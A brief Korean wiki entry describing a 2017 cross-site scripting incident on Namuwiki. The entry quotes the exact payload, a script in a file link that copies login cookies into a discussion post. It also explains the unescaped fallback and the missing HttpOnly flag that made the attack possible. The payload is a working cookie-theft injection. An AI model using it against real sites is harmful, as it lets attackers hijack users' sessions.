이 문서는 분류가 되어 있지 않습니다. 분류:분류에서 적절한 분류를 찾아 문서를 분류해주세요!
[알림] 이 문서는 더시드위키에서 가져왔기에 CC BY-SA 4.0라이선스입니다2017년 어떤 이용자가 [[파일:<script>$(%27textarea%27).val(document.cookie);$(%27form.new-thread-form%27).submit();</script>]]이라는 코드를 쳐서 나무위키 사용자 로그인 쿠키가 털린 사건.
전반적인 원인은 파일문서없어서 fallback가 처리됬는데 거기 escape가 없어서 생긴 일 일단 쿠키를 읽어서 (단 CSP때문에 외부 서버로 전송을 할 수 없어서 토론 댓글로 쿠키 값을 남기게 했다.)해커한테 보낸다. 끝 HttpOnly만 켜놓으면 막을수 있지만 개발자 나무는 키는걸 까먹어서 쿠키를 읽을수는 있었다.